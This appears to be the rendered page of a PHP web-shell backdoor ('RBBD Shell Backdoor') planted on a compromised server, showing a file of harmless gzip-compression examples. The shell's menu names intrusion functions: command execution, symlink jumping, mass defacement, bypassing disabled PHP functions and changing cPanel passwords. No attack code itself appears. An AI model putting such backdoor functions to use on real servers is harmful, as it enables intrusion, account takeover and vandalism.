⚜ RBBD Shell Backdoor ⚜
Current Dir
:
D:
/
php
/
mysql_backup
/
Home
Upload
Command
Config
Jumping
Symlink
Mass Deface
Bypass Disable Function
K-RDP 5H3LL
Adminer
Change Password cPanel
Zone-H
Current File : D:/php/mysql_backup/mysql
priklad I <?php // Name of the file we are compressing $file = "test.txt"; // Name of the gz file we are creating $gzfile = "test.gz"; // Open the gz file (w9 is the highest compression) $fp = gzopen ($gzfile, 'w9'); // Compress the file gzwrite ($fp, file_get_contents($file)); // Close the gz file and we are done gzclose($fp); ?> priklad II <?php function compress($srcName, $dstName) { $fp = fopen($srcName, "r"); $data = fread ($fp, filesize($srcName)); fclose($fp); $zp = gzopen($dstName, "w9"); gzwrite($zp, $data); gzclose($zp); } // Compress a file compress("/web/myfile.dat", "/web/myfile.gz"); ?>
Fighter Anas Private Shell V.1 -
Royal
Battler BD
Copyright © Fighter Anas